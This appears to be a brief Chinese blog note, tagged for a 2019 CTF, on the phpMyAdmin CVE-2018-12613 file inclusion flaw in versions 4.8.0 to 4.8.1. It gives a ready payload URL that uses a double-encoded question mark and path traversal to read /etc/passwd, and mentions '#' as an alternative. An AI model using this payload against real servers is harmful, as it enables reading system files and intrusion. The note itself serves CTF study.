phpMyadmin(CVE-2018-12613)后台任意文件包含漏洞
影响版本:4.8.0——4.8.1
payload:/phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../etc/passwd
这里的解析会将?二次编码当成目录 不止? #也可以实现这个效果
参考链接1
参考链接2
标签:phpmyadmin,phpmyadmin4.8,..,参考,4.8,datadict,GWCTF,2019,链接
来源: https://www.cnblogs.com/xcj-djx/p/13811203.html